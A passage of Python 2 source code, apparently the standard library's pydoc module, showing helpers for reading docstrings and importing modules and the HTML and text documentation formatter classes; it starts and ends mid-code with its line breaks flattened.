dir = os.path.abspath(dir or '.') normdir = os.path.normcase(dir) if normdir not in normdirs and os.path.isdir(dir): dirs.append(dir) normdirs.append(normdir) return dirs def getdoc(object): """Get the doc string or comments for an object.""" result = inspect.getdoc(object) or inspect.getcomments(object) result = _encode(result) return result and re.sub('^ *\n', '', rstrip(result)) or '' def splitdoc(doc): """Split a doc string into a synopsis line (if any) and the rest.""" lines = split(strip(doc), '\n') if len(lines) == 1: return lines[0], '' elif len(lines) >= 2 and not rstrip(lines[1]): return lines[0], join(lines[2:], '\n') return '', join(lines, '\n') def classname(object, modname): """Get a class name and qualify it with a module name if necessary.""" name = object.__name__ if object.__module__ != modname: name = object.__module__ + '.' + name return name def isdata(object): """Check if an object is of a type that probably means it's data.""" return not (inspect.ismodule(object) or inspect.isclass(object) or inspect.isroutine(object) or inspect.isframe(object) or inspect.istraceback(object) or inspect.iscode(object)) def replace(text, *pairs): """Do a series of global replacements on a string.""" while pairs: text = join(split(text, pairs[0]), pairs[1]) pairs = pairs[2:] return text def cram(text, maxlen): """Omit part of a string if needed to make it fit in a maximum length.""" if len(text) > maxlen: pre = max(0, (maxlen-3)//2) post = max(0, maxlen-3-pre) return text[:pre] + '...' + text[len(text)-post:] return text _re_stripid = re.compile(r' at 0x[0-9a-f]{6,16}(>+)$', re.IGNORECASE) def stripid(text): """Remove the hexadecimal id from a Python object representation.""" # The behaviour of %p is implementation-dependent in terms of case. return _re_stripid.sub(r'\1', text) def _is_some_method(obj): return inspect.ismethod(obj) or inspect.ismethoddescriptor(obj) def allmethods(cl): methods = {} for key, value in inspect.getmembers(cl, _is_some_method): methods[key] = 1 for base in cl.__bases__: methods.update(allmethods(base)) # all your base are belong to us for key in methods.keys(): methods[key] = getattr(cl, key) return methods def _split_list(s, predicate): """Split sequence s via predicate, and return pair ([true], [false]). The return value is a 2-tuple of lists, ([x for x in s if predicate(x)], [x for x in s if not predicate(x)]) """ yes = [] no = [] for x in s: if predicate(x): yes.append(x) else: no.append(x) return yes, no def visiblename(name, all=None, obj=None): """Decide whether to show documentation on a variable.""" # Certain special names are redundant. _hidden_names = ('__builtins__', '__doc__', '__file__', '__path__', '__module__', '__name__', '__slots__', '__package__') if name in _hidden_names: return 0 # Private names are hidden, but special names are displayed. if name.startswith('__') and name.endswith('__'): return 1 # Namedtuples have public fields and methods with a single leading underscore if name.startswith('_') and hasattr(obj, '_fields'): return 1 if all is not None: # only document that which the programmer exported in __all__ return name in all else: return not name.startswith('_') def classify_class_attrs(object): """Wrap inspect.classify_class_attrs, with fixup for data descriptors.""" def fixup(data): name, kind, cls, value = data if inspect.isdatadescriptor(value): kind = 'data descriptor' return name, kind, cls, value return map(fixup, inspect.classify_class_attrs(object)) # ----------------------------------------------------- Unicode support helpers try: _unicode = unicode except NameError: # If Python is built without Unicode support, the unicode type # will not exist. Fake one that nothing will match, and make # the _encode function that do nothing. class _unicode(object): pass _encoding = 'ascii' def _encode(text, encoding='ascii'): return text else: import locale _encoding = locale.getpreferredencoding() def _encode(text, encoding=None): if isinstance(text, unicode): return text.encode(encoding or _encoding, 'xmlcharrefreplace') else: return text def _binstr(obj): # Ensure that we have an encoded (binary) string representation of obj, # even if it is a unicode string. if isinstance(obj, _unicode): return obj.encode(_encoding, 'xmlcharrefreplace') return str(obj) # ----------------------------------------------------- module manipulation def ispackage(path): """Guess whether a path refers to a package directory.""" if os.path.isdir(path): for ext in ('.py', '.pyc', '.pyo'): if os.path.isfile(os.path.join(path, '__init__' + ext)): return True return False def source_synopsis(file): line = file.readline() while line[:1] == '#' or not strip(line): line = file.readline() if not line: break line = strip(line) if line[:4] == 'r"""': line = line[1:] if line[:3] == '"""': line = line[3:] if line[-1:] == '\\': line = line[:-1] while not strip(line): line = file.readline() if not line: break result = strip(split(line, '"""')[0]) else: result = None return result def synopsis(filename, cache={}): """Get the one-line summary out of a module file.""" mtime = os.stat(filename).st_mtime lastupdate, result = cache.get(filename, (None, None)) if lastupdate is None or lastupdate < mtime: info = inspect.getmoduleinfo(filename) try: file = open(filename) except IOError: # module can't be opened, so skip it return None if info and 'b' in info[2]: # binary modules have to be imported try: module = imp.load_module('__temp__', file, filename, info[1:]) except: return None result = (module.__doc__ or '').splitlines()[0] del sys.modules['__temp__'] else: # text modules can be directly examined result = source_synopsis(file) file.close() cache[filename] = (mtime, result) return result class ErrorDuringImport(Exception): """Errors that occurred while trying to import something to document it.""" def __init__(self, filename, exc_info): exc, value, tb = exc_info self.filename = filename self.exc = exc self.value = value self.tb = tb def __str__(self): exc = self.exc if type(exc) is types.ClassType: exc = exc.__name__ return 'problem in %s - %s: %s' % (self.filename, exc, self.value) def importfile(path): """Import a Python source file or compiled file given its path.""" magic = imp.get_magic() file = open(path, 'r') if file.read(len(magic)) == magic: kind = imp.PY_COMPILED else: kind = imp.PY_SOURCE file.close() filename = os.path.basename(path) name, ext = os.path.splitext(filename) file = open(path, 'r') try: module = imp.load_module(name, file, path, (ext, 'r', kind)) except: raise ErrorDuringImport(path, sys.exc_info()) file.close() return module def safeimport(path, forceload=0, cache={}): """Import a module; handle errors; return None if the module isn't found. If the module *is* found but an exception occurs, it's wrapped in an ErrorDuringImport exception and reraised. Unlike __import__, if a package path is specified, the module at the end of the path is returned, not the package at the beginning. If the optional 'forceload' argument is 1, we reload the module from disk (unless it's a dynamic extension).""" try: # If forceload is 1 and the module has been previously loaded from # disk, we always have to reload the module. Checking the file's # mtime isn't good enough (e.g. the module could contain a class # that inherits from another module that has changed). if forceload and path in sys.modules: if path not in sys.builtin_module_names: # Avoid simply calling reload() because it leaves names in # the currently loaded module lying around if they're not # defined in the new source file. Instead, remove the # module from sys.modules and re-import. Also remove any # submodules because they won't appear in the newly loaded # module's namespace if they're already in sys.modules. subs = [m for m in sys.modules if m.startswith(path + '.')] for key in [path] + subs: # Prevent garbage collection. cache[key] = sys.modules[key] del sys.modules[key] module = __import__(path) except: # Did the error occur before or after the module was found? (exc, value, tb) = info = sys.exc_info() if path in sys.modules: # An error occurred while executing the imported module. raise ErrorDuringImport(sys.modules[path].__file__, info) elif exc is SyntaxError: # A SyntaxError occurred before we could execute the module. raise ErrorDuringImport(value.filename, info) elif exc is ImportError and extract_tb(tb)[-1][2]=='safeimport': # The import error occurred directly in this function, # which means there is no such module in the path. return None else: # Some other error occurred during the importing process. raise ErrorDuringImport(path, sys.exc_info()) for part in split(path, '.')[1:]: try: module = getattr(module, part) except AttributeError: return None return module # ---------------------------------------------------- formatter base class class Doc: def document(self, object, name=None, *args): """Generate documentation for an object.""" args = (object, name) + args # 'try' clause is to attempt to handle the possibility that inspect # identifies something in a way that pydoc itself has issues handling; # think 'super' and how it is a descriptor (which raises the exception # by lacking a __name__ attribute) and an instance. if inspect.isgetsetdescriptor(object): return self.docdata(*args) if inspect.ismemberdescriptor(object): return self.docdata(*args) try: if inspect.ismodule(object): return self.docmodule(*args) if inspect.isclass(object): return self.docclass(*args) if inspect.isroutine(object): return self.docroutine(*args) except AttributeError: pass if isinstance(object, property): return self.docproperty(*args) return self.docother(*args) def fail(self, object, name=None, *args): """Raise an exception for unimplemented types.""" message = "don't know how to document object%s of type %s" % ( name and ' ' + repr(name), type(object).__name__) raise TypeError, message docmodule = docclass = docroutine = docother = docproperty = docdata = fail def getdocloc(self, object): """Return the location of module docs or None""" try: file = inspect.getabsfile(object) except TypeError: file = '(built-in)' docloc = os.environ.get("PYTHONDOCS", "http://docs.python.org/library") basedir = os.path.join(sys.exec_prefix, "lib", "python"+sys.version[0:3]) if (isinstance(object, type(os)) and (object.__name__ in ('errno', 'exceptions', 'gc', 'imp', 'marshal', 'posix', 'signal', 'sys', 'thread', 'zipimport') or (file.startswith(basedir) and not file.startswith(os.path.join(basedir, 'site-packages')))) and object.__name__ not in ('xml.etree', 'test.pydoc_mod')): if docloc.startswith("http://"): docloc = "%s/%s" % (docloc.rstrip("/"), object.__name__) else: docloc = os.path.join(docloc, object.__name__ + ".html") else: docloc = None return docloc # -------------------------------------------- HTML documentation generator class HTMLRepr(Repr): """Class for safely making an HTML representation of a Python object.""" def __init__(self): Repr.__init__(self) self.maxlist = self.maxtuple = 20 self.maxdict = 10 self.maxstring = self.maxother = 100 def escape(self, text): return replace(text, '&', '&amp;', '<', '&lt;', '>', '&gt;') def repr(self, object): return Repr.repr(self, object) def repr1(self, x, level): if hasattr(type(x), '__name__'): methodname = 'repr_' + join(split(type(x).__name__), '_') if hasattr(self, methodname): return getattr(self, methodname)(x, level) return self.escape(cram(stripid(repr(x)), self.maxother)) def repr_string(self, x, level): test = cram(x, self.maxstring) testrepr = repr(test) if '\\' in test and '\\' not in replace(testrepr, r'\\', ''): # Backslashes are only literal in the string and are never # needed to make any special characters, so show a raw string. return 'r' + testrepr[0] + self.escape(test) + testrepr[0] return re.sub(r'((\\[\\abfnrtv\'"]|\\[0-9]..|\\x..|\\u....)+)', r'<font color="#c040c0">\1</font>', self.escape(testrepr)) repr_str = repr_string def repr_instance(self, x, level): try: return self.escape(cram(stripid(repr(x)), self.maxstring)) except: return self.escape('<%s instance>' % x.__class__.__name__) repr_unicode = repr_string class HTMLDoc(Doc): """Formatter class for HTML documentation.""" # ------------------------------------------- HTML formatting utilities _repr_instance = HTMLRepr() repr = _repr_instance.repr escape = _repr_instance.escape def page(self, title, contents): """Format an HTML page.""" return _encode(''' <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html><head><title>Python: %s</title> <meta charset="utf-8"> </head><body bgcolor="#f0f0f8"> %s </body></html>''' % (title, contents), 'ascii') def heading(self, title, fgcol, bgcol, extras=''): """Format a page heading.""" return ''' <table width="100%%" cellspacing=0 cellpadding=2 border=0 summary="heading"> <tr bgcolor="%s"> <td valign=bottom>&nbsp;<br> <font color="%s" face="helvetica, arial">&nbsp;<br>%s</font></td ><td align=right valign=bottom ><font color="%s" face="helvetica, arial">%s</font></td></tr></table> ''' % (bgcol, fgcol, title, fgcol, extras or '&nbsp;') def section(self, title, fgcol, bgcol, contents, width=6, prelude='', marginalia=None, gap='&nbsp;'): """Format a section with a heading.""" if marginalia is None: marginalia = '<tt>' + '&nbsp;' * width + '</tt>' result = '''<p> <table width="100%%" cellspacing=0 cellpadding=2 border=0 summary="section"> <tr bgcolor="%s"> <td colspan=3 valign=bottom>&nbsp;<br> <font color="%s" face="helvetica, arial">%s</font></td></tr> ''' % (bgcol, fgcol, title) if prelude: result = result + ''' <tr bgcolor="%s"><td rowspan=2>%s</td> <td colspan=2>%s</td></tr> <tr><td>%s</td>''' % (bgcol, marginalia, prelude, gap) else: result = result + ''' <tr><td bgcolor="%s">%s</td><td>%s</td>''' % (bgcol, marginalia, gap) return result + '\n<td width="100%%">%s</td></tr></table>' % contents def bigsection(self, title, *args): """Format a section with a big heading.""" title = '<big><strong>%s</strong></big>' % title return self.section(title, *args) def preformat(self, text): """Format literal preformatted text.""" text = self.escape(expandtabs(text)) return replace(text, '\n\n', '\n \n', '\n\n', '\n \n', ' ', '&nbsp;', '\n', '<br>\n') def multicolumn(self, list, format, cols=4): """Format a list of items into a multi-column list.""" result = '' rows = (len(list)+cols-1)//cols for col in range(cols): result = result + '<td width="%d%%" valign=top>' % (100//cols) for i in range(rows*col, rows*col+rows): if i < len(list): result = result + format(list[i]) + '<br>\n' result = result + '</td>' return '<table width="100%%" summary="list"><tr>%s</tr></table>' % result def grey(self, text): return '<font color="#909090">%s</font>' % text def namelink(self, name, *dicts): """Make a link for an identifier, given name-to-URL mappings.""" for dict in dicts: if name in dict: return '<a href="%s">%s</a>' % (dict[name], name) return name def classlink(self, object, modname): """Make a link for a class.""" name, module = object.__name__, sys.modules.get(object.__module__) if hasattr(module, name) and getattr(module, name) is object: return '<a href="%s.html#%s">%s</a>' % ( module.__name__, name, classname(object, modname)) return classname(object, modname) def modulelink(self, object): """Make a link for a module.""" return '<a href="%s.html">%s</a>' % (object.__name__, object.__name__) def modpkglink(self, data): """Make a link for a module or package to display in an index.""" name, path, ispackage, shadowed = data if shadowed: return self.grey(name) if path: url = '%s.%s.html' % (path, name) else: url = '%s.html' % name if ispackage: text = '<strong>%s</strong>&nbsp;(package)' % name else: text = name return '<a href="%s">%s</a>' % (url, text) def markup(self, text, escape=None, funcs={}, classes={}, methods={}): """Mark up some plain text, given a context of symbols to look for. Each context dictionary maps object names to anchor names.""" escape = escape or self.escape results = [] here = 0 pattern = re.compile(r'\b((http|ftp)://\S+[\w/]|' r'RFC[- ]?(\d+)|' r'PEP[- ]?(\d+)|' r'(self\.)?(\w+))') while True: match = pattern.search(text, here) if not match: break start, end = match.span() results.append(escape(text[here:start])) all, scheme, rfc, pep, selfdot, name = match.groups() if scheme: url = escape(all).replace('"', '&quot;') results.append('<a href="%s">%s</a>' % (url, url)) elif rfc: url = 'http://www.rfc-editor.org/rfc/rfc%d.txt' % int(rfc) results.append('<a href="%s">%s</a>' % (url, escape(all))) elif pep: url = 'http://www.python.org/dev/peps/pep-%04d/' % int(pep) results.append('<a href="%s">%s</a>' % (url, escape(all))) elif selfdot: # Create a link for methods like 'self.method(...)' # and use <strong> for attributes like 'self.attr' if text[end:end+1] == '(': results.append('self.' + self.namelink(name, methods)) else: results.append('self.<strong>%s</strong>' % name) elif text[end:end+1] == '(': results.append(self.namelink(name, methods, funcs, classes)) else: results.append(self.namelink(name, classes)) here = end results.append(escape(text[here:])) return join(results, '') # ---------------------------------------------- type-specific routines def formattree(self, tree, modname, parent=None): """Produce HTML for a class tree as given by inspect.getclasstree().""" result = '' for entry in tree: if type(entry) is type(()): c, bases = entry result = result + '<dt><font face="helvetica, arial">' result = result + self.classlink(c, modname) if bases and bases != (parent,): parents = [] for base in bases: parents.append(self.classlink(base, modname)) result = result + '(' + join(parents, ', ') + ')' result = result + '\n</font></dt>' elif type(entry) is type([]): result = result + '<dd>\n%s</dd>\n' % self.formattree( entry, modname, c) return '<dl>\n%s</dl>\n' % result def docmodule(self, object, name=None, mod=None, *ignored): """Produce HTML documentation for a module object.""" name = object.__name__ # ignore the passed-in name try: all = object.__all__ except AttributeError: all = None parts = split(name, '.') links = [] for i in range(len(parts)-1): links.append( '<a href="%s.html"><font color="#ffffff">%s</font></a>' % (join(parts[:i+1], '.'), parts[i])) linkedname = join(links + parts[-1:], '.') head = '<big><big><strong>%s</strong></big></big>' % linkedname try: path = inspect.getabsfile(object) url = path if sys.platform == 'win32': import nturl2path url = nturl2path.pathname2url(path) filelink = '<a href="file:%s">%s</a>' % (url, path) except TypeError: filelink = '(built-in)' info = [] if hasattr(object, '__version__'): version = _binstr(object.__version__) if version[:11] == '$' + 'Revision: ' and version[-1:] == '$': version = strip(version[11:-1]) info.append('version %s' % self.escape(version)) if hasattr(object, '__date__'): info.append(self.escape(_binstr(object.__date__))) if info: head = head + ' (%s)' % join(info, ', ') docloc = self.getdocloc(object) if docloc is not None: docloc = '<br><a href="%(docloc)s">Module Docs</a>' % locals() else: docloc = '' result = self.heading( head, '#ffffff', '#7799ee', '<a href=".">index</a><br>' + filelink + docloc) modules = inspect.getmembers(object, inspect.ismodule) classes, cdict = [], {} for key, value in inspect.getmembers(object, inspect.isclass): # if __all__ exists, believe it. Otherwise use old heuristic. if (all is not None or (inspect.getmodule(value) or object) is object): if visiblename(key, all, object): classes.append((key, value)) cdict[key] = cdict[value] = '#' + key for key, value in classes: for base in value.__bases__: key, modname = base.__name__, base.__module__ module = sys.modules.get(modname) if modname != name and module and hasattr(module, key): if getattr(module, key) is base: if not key in cdict: cdict[key] = cdict[base] = modname + '.html#' + key funcs, fdict = [], {} for key, value in inspect.getmembers(object, inspect.isroutine): # if __all__ exists, believe it. Otherwise use old heuristic. if (all is not None or inspect.isbuiltin(value) or inspect.getmodule(value) is object): if visiblename(key, all, object): funcs.append((key, value)) fdict[key] = '#-' + key if inspect.isfunction(value): fdict[value] = fdict[key] data = [] for key, value in inspect.getmembers(object, isdata): if visiblename(key, all, object): data.append((key, value)) doc = self.markup(getdoc(object), self.preformat, fdict, cdict) doc = doc and '<tt>%s</tt>' % doc result = result + '<p>%s</p>\n' % doc if hasattr(object, '__path__'): modpkgs = [] for importer, modname, ispkg in pkgutil.iter_modules(object.__path__): modpkgs.append((modname, name, ispkg, 0)) modpkgs.sort() contents = self.multicolumn(modpkgs, self.modpkglink) result = result + self.bigsection( 'Package Contents', '#ffffff', '#aa55cc', contents) elif modules: contents = self.multicolumn( modules, lambda key_value, s=self: s.modulelink(key_value[1])) result = result + self.bigsection( 'Modules', '#ffffff', '#aa55cc', contents) if classes: classlist = map(lambda key_value: key_value[1], classes) contents = [ self.formattree(inspect.getclasstree(classlist, 1), name)] for key, value in classes: contents.append(self.document(value, key, name, fdict, cdict)) result = result + self.bigsection( 'Classes', '#ffffff', '#ee77aa', join(contents)) if funcs: contents = [] for key, value in funcs: contents.append(self.document(value, key, name, fdict, cdict)) result = result + self.bigsection( 'Functions', '#ffffff', '#eeaa77', join(contents)) if data: contents = [] for key, value in data: contents.append(self.document(value, key)) result = result + self.bigsection( 'Data', '#ffffff', '#55aa55', join(contents, '<br>\n')) if hasattr(object, '__author__'): contents = self.markup(_binstr(object.__author__), self.preformat) result = result + self.bigsection( 'Author', '#ffffff', '#7799ee', contents) if hasattr(object, '__credits__'): contents = self.markup(_binstr(object.__credits__), self.preformat) result = result + self.bigsection( 'Credits', '#ffffff', '#7799ee', contents) return result def docclass(self, object, name=None, mod=None, funcs={}, classes={}, *ignored): """Produce HTML documentation for a class object.""" realname = object.__name__ name = name or realname bases = object.__bases__ contents = [] push = contents.append # Cute little class to pump out a horizontal rule between sections. class HorizontalRule: def __init__(self): self.needone = 0 def maybe(self): if self.needone: push('<hr>\n') self.needone = 1 hr = HorizontalRule() # List the mro, if non-trivial. mro = deque(inspect.getmro(object)) if len(mro) > 2: hr.maybe() push('<dl><dt>Method resolution order:</dt>\n') for base in mro: push('<dd>%s</dd>\n' % self.classlink(base, object.__module__)) push('</dl>\n') def spill(msg, attrs, predicate): ok, attrs = _split_list(attrs, predicate) if ok: hr.maybe() push(msg) for name, kind, homecls, value in ok: try: value = getattr(object, name) except Exception: # Some descriptors may meet a failure in their __get__. # (bug #1785) push(self._docdescriptor(name, value, mod)) else: push(self.document(value, name, mod, funcs, classes, mdict, object)) push('\n') return attrs def spilldescriptors(msg, attrs, predicate): ok, attrs = _split_list(attrs, predicate) if ok: hr.maybe() push(msg) for name, kind, homecls, value in ok: push(self._docdescriptor(name, value, mod)) return attrs def spilldata(msg, attrs, predicate): ok, attrs = _split_list(attrs, predicate) if ok: hr.maybe() push(msg) for name, kind, homecls, value in ok: base = self.docother(getattr(object, name), name, mod) if (hasattr(value, '__call__') or inspect.isdatadescriptor(value)): doc = getattr(value, "__doc__", None) else: doc = None if doc is None: push('<dl><dt>%s</dl>\n' % base) else: doc = self.markup(getdoc(value), self.preformat, funcs, classes, mdict) doc = '<dd><tt>%s</tt>' % doc push('<dl><dt>%s%s</dl>\n' % (base, doc)) push('\n') return attrs attrs = filter(lambda data: visiblename(data[0], obj=object), classify_class_attrs(object)) mdict = {} for key, kind, homecls, value in attrs: mdict[key] = anchor = '#' + name + '-' + key try: value = getattr(object, name) except Exception: # Some descriptors may meet a failure in their __get__. # (bug #1785) pass try: # The value may not be hashable (e.g., a data attr with # a dict or list value). mdict[value] = anchor except TypeError: pass while attrs: if mro: thisclass = mro.popleft() else: thisclass = attrs[0][2] attrs, inherited = _split_list(attrs, lambda t: t[2] is thisclass) if thisclass is __builtin__.object: attrs = inherited continue elif thisclass is object: tag = 'defined here' else: tag = 'inherited from %s' % self.classlink(thisclass, object.__module__) tag += ':<br>\n' # Sort attrs by name. try: attrs.sort(key=lambda t: t[0]) except TypeError: attrs.sort(lambda t1, t2: cmp(t1[0], t2[0])) # 2.3 compat # Pump out the attrs, segregated by kind. attrs = spill('Methods %s' % tag, attrs, lambda t: t[1] == 'method') attrs = spill('Class methods %s' % tag, attrs, lambda t: t[1] == 'class method') attrs = spill('Static methods %s' % tag, attrs, lambda t: t[1] == 'static method') attrs = spilldescriptors('Data descriptors %s' % tag, attrs, lambda t: t[1] == 'data descriptor') attrs = spilldata('Data and other attributes %s' % tag, attrs, lambda t: t[1] == 'data') assert attrs == [] attrs = inherited contents = ''.join(contents) if name == realname: title = '<a name="%s">class <strong>%s</strong></a>' % ( name, realname) else: title = '<strong>%s</strong> = <a name="%s">class %s</a>' % ( name, name, realname) if bases: parents = [] for base in bases: parents.append(self.classlink(base, object.__module__)) title = title + '(%s)' % join(parents, ', ') doc = self.markup(getdoc(object), self.preformat, funcs, classes, mdict) doc = doc and '<tt>%s<br>&nbsp;</tt>' % doc return self.section(title, '#000000', '#ffc8d8', contents, 3, doc) def formatvalue(self, object): """Format an argument default value as text.""" return self.grey('=' + self.repr(object)) def docroutine(self, object, name=None, mod=None, funcs={}, classes={}, methods={}, cl=None): """Produce HTML documentation for a function or method object.""" realname = object.__name__ name = name or realname anchor = (cl and cl.__name__ or '') + '-' + name note = '' skipdocs = 0 if inspect.ismethod(object): imclass = object.im_class if cl: if imclass is not cl: note = ' from ' + self.classlink(imclass, mod) else: if object.im_self is not None: note = ' method of %s instance' % self.classlink( object.im_self.__class__, mod) else: note = ' unbound %s method' % self.classlink(imclass,mod) object = object.im_func if name == realname: title = '<a name="%s"><strong>%s</strong></a>' % (anchor, realname) else: if (cl and realname in cl.__dict__ and cl.__dict__[realname] is object): reallink = '<a href="#%s">%s</a>' % ( cl.__name__ + '-' + realname, realname) skipdocs = 1 else: reallink = realname title = '<a name="%s"><strong>%s</strong></a> = %s' % ( anchor, name, reallink) if inspect.isfunction(object): args, varargs, varkw, defaults = inspect.getargspec(object) argspec = inspect.formatargspec( args, varargs, varkw, defaults, formatvalue=self.formatvalue) if realname == '<lambda>': title = '<strong>%s</strong> <em>lambda</em> ' % name argspec = argspec[1:-1] # remove parentheses else: argspec = '(...)' decl = title + argspec + (note and self.grey( '<font face="helvetica, arial">%s</font>' % note)) if skipdocs: return '<dl><dt>%s</dt></dl>\n' % decl else: doc = self.markup( getdoc(object), self.preformat, funcs, classes, methods) doc = doc and '<dd><tt>%s</tt></dd>' % doc return '<dl><dt>%s</dt>%s</dl>\n' % (decl, doc) def _docdescriptor(self, name, value, mod): results = [] push = results.append if name: push('<dl><dt><strong>%s</strong></dt>\n' % name) if value.__doc__ is not None: doc = self.markup(getdoc(value), self.preformat) push('<dd><tt>%s</tt></dd>\n' % doc) push('</dl>\n') return ''.join(results) def docproperty(self, object, name=None, mod=None, cl=None): """Produce html documentation for a property.""" return self._docdescriptor(name, object, mod) def docother(self, object, name=None, mod=None, *ignored): """Produce HTML documentation for a data object.""" lhs = name and '<strong>%s</strong> = ' % name or '' return lhs + self.repr(object) def docdata(self, object, name=None, mod=None, cl=None): """Produce html documentation for a data descriptor.""" return self._docdescriptor(name, object, mod) def index(self, dir, shadowed=None): """Generate an HTML index for a directory of modules.""" modpkgs = [] if shadowed is None: shadowed = {} for importer, name, ispkg in pkgutil.iter_modules([dir]): modpkgs.append((name, '', ispkg, name in shadowed)) shadowed[name] = 1 modpkgs.sort() contents = self.multicolumn(modpkgs, self.modpkglink) return self.bigsection(dir, '#ffffff', '#ee77aa', contents) # -------------------------------------------- text documentation generator class TextRepr(Repr): """Class for safely making a text representation of a Python object.""" def __init__(self): Repr.__init__(self) self.maxlist = self.maxtuple = 20 self.maxdict = 10 self.maxstring = self.maxother = 100 def repr1(self, x, level): if hasattr(type(x), '__name__'): methodname = 'repr_' + join(split(type(x).__name__), '_') if hasattr(self, methodname): return getattr(self, methodname)(x, level) return cram(stripid(repr(x)), self.maxother) def repr_string(self, x, level): test = cram(x, self.maxstring) testrepr = repr(test) if '\\' in test and '\\' not in replace(testrepr, r'\\', ''): # Backslashes are only literal in the string and are never # needed to make any special characters, so show a raw string. return 'r' + testrepr[0] + test + testrepr[0] return testrepr repr_str = repr_string def repr_instance(self, x, level): try: return cram(stripid(repr(x)), self.maxstring) except: return '<%s instance>' % x.__class__.__name__ class TextDoc(Doc): """Formatter class for text documentation.""" # ------------------------------------------- text formatting utilities _repr_instance = TextRepr() repr = _repr_instance.repr def bold(self, text): """Format a string in bold by overstriking.""" return join(map(lambda ch: ch + '\b' + ch, text), '') def indent(self, text, prefix=' '): """Indent text by prepending a given prefix to each line.""" if not text: return '' lines = split(text, '\n') lines = map(lambda line, prefix=prefix: prefix + line, lines) if lines: lines[-1] = rstrip(lines[-1]) return join(lines, '\n') def section(self, title, contents): """Format a section with a given heading.""" return self.bold(title) + '\n' + rstrip(self.indent(contents)) + '\n\n' # ---------------------------------------------- type-specific routines def formattree(self, tree, modname, parent=None, prefix=''): """Render in text a class tree as returned by inspect.getclasstree().""" result = '' for entry in tree: if type(entry) is type(()): c, bases = entry result = result + prefix + classname(c, modname) if bases and bases != (parent,): parents = map(lambda c, m=modname: classname(c, m), bases) result = result + '(%s)' % join(parents, ', ') result = result + '\n' elif type(entry) is type([]): result = result + self.formattree( entry, modname, c, prefix + ' ') return result def docmodule(self, object, name=None, mod=None): """Produce text documentation for a given module object.""" name = object.__name__ # ignore the passed-in name synop, desc = splitdoc(getdoc(object)) result = self.section('NAME', name + (synop and ' - ' + synop)) try: all = object.__all__ except AttributeError: all = None try: file = inspect.getabsfile(object) except TypeError: file = '(built-in)' result = result + self.section('FILE', file) docloc = self.getdocloc(object) if docloc is not None: result = result + self.section('MODULE DOCS', docloc) if desc: result = result + self.section('DESCRIPTION', desc) classes = [] for key, value in inspect.getmembers(object, inspect.isclass): # if __all__ exists, believe it. Otherwise use old heuristic. if (all is not None or (inspect.getmodule(value) or object) is object): if visiblename(key, all, object): classes.append((key, value)) funcs = [] for key, value in inspect.getmembers(object, inspect.isroutine): # if __all__ exists, believe it. Otherwise use old heuristic. if (all is not None or inspect.isbuiltin(value) or inspect.getmodule(value) is object): if visiblename(key, all, object): funcs.append((key, value)) data = [] for key, value in inspect.getmembers(object, isdata): if visiblename(key, all, object): data.append((key, value)) modpkgs = [] modpkgs_names = set() if hasattr(object, '__path__'): for importer, modname, ispkg in pkgutil.iter_modules(object.__path__): modpkgs_names.add(modname) if ispkg: modpkgs.append(modname + ' (package)') else: modpkgs.append(modname) modpkgs.sort() result = result + self.section( 'PACKAGE CONTENTS', join(modpkgs, '\n')) # Detect submodules as sometimes created by C extensions submodules = [] for key, value in inspect.getmembers(object, inspect.ismodule): if value.__name__.startswith(name + '.') and key not in modpkgs_names: submodules.append(key) if submodules: submodules.sort() result = result + self.section( 'SUBMODULES', join(submodules, '\n')) if classes: classlist = map(lambda key_value: key_value[1], classes) contents = [self.formattree( inspect.getclasstree(classlist, 1), name)] for key, value in classes: contents.append(self.document(value, key, name)) result = result + self.section('CLASSES', join(contents, '\n')) if funcs: contents = [] for key, value in funcs: contents.append(self.document(value, key, name)) result = result + self.section('FUNCTIONS', join(contents, '\n')) if data: contents = [] for key, value in data: contents.append(self.docother(value, key, name, maxlen=70)) result = result + self.section('DATA', join(contents, '\n')) if hasattr(object, '__version__'): version = _binstr(object.__version__) if version[:11] == '$' + 'Revision: ' and version[-1:] == '$': version = strip(version[11:-1]) result = result + self.section('VERSION', version) if hasattr(object, '__date__'): result = result + self.section('DATE', _binstr(object.__date__)) if hasattr(object, '__author__'): result = result + self.section('AUTHOR', _binstr(object.__author__)) if hasattr(object, '__credits__'): result = result + self.section('CREDITS', _binstr(object.__credits__)) return result def docclass(self, object, name=None, mod=None, *ignored): """Produce text documentation for a given class object.""" realname = object.__name__ name = name or realname bases = object.__bases__ def makename(c, m=object.__module__): return classname(c, m) if name == realname: title = 'class ' + self.bold(realname) else: title = self.bold(name) + ' = class ' + realname if bases: parents = map(makename, bases) title = title + '(%s)' % join(parents, ', ') doc = getdoc(object) contents = doc and [doc + '\n'] or [] push = contents.append # List the mro, if non-trivial. mro = deque(inspect.getmro(object)) if len(mro) > 2: push("Method resolution order:") for base in mro: push(' ' + makename(base)) push('') # Cute little class to pump out a horizontal rule between sections. class HorizontalRule: def __init__(self): self.needone = 0 def maybe(self): if self.needone: push('-' * 70) self.needone = 1 hr = HorizontalRule() def spill(msg, attrs, predicate): ok, attrs = _split_list(attrs, predicate) if ok: hr.maybe() push(msg) for name, kind, homecls, value in ok: try: value = getattr(object, name) except Exception: # Some descriptors may meet a failure in their __get__. # (bug #1785) push(self._docdescriptor(name, value, mod)) else: push(self.document(value, name, mod, object)) return attrs def spilldescriptors(msg, attrs, predicate): ok, attrs = _split_list(attrs, predicate) if ok: hr.maybe() push(msg) for name, kind, homecls, value in ok: push(self._docdescriptor(name, value, mod)) return attrs def spilldata(msg, attrs, predicate): ok, attrs = _split_list(attrs, predicate) if ok: hr.maybe() push(msg) for name, kind, homecls, value in ok: if (hasattr(value, '__call__') or inspect.isdatadescriptor(value)): doc = getdoc(value) else: doc = None push(self.docother(getattr(object, name), name, mod, maxlen=70, doc=doc) + '\n') return attrs attrs = filter(lambda data: visiblename(data[0], obj=object), classify_class_attrs(object)) while attrs: if mro: thisclass = mro.popleft() else: thisclass = attrs[0][2] attrs, inherited = _split_list(attrs, lambda t: t[2] is thisclass) if thisclass is __builtin__.object: attrs = inherited continue elif thisclass is object: tag = "defined here" else: tag = "inherited from %s" % classname(thisclass, object.__module__) # Sort attrs by name. attrs.sort() # Pump out the attrs, segregated by kind. attrs = spill("Methods %s:\n" % tag, attrs, lambda t: t[1] == 'method') attrs = spill("Class methods %s:\n" % tag, attrs, lambda t: t[1] == 'class method') attrs = spill("Static methods %s:\n" % tag, attrs, lambda t: t[1] == 'static method') attrs = spilldescriptors("Data descriptors %s:\n" % tag, attrs, lambda t: t[1] == 'data descriptor') attrs = spilldata("Data and other attributes %s:\n" % tag, attrs, lambda t: t[1] == 'data') assert attrs == 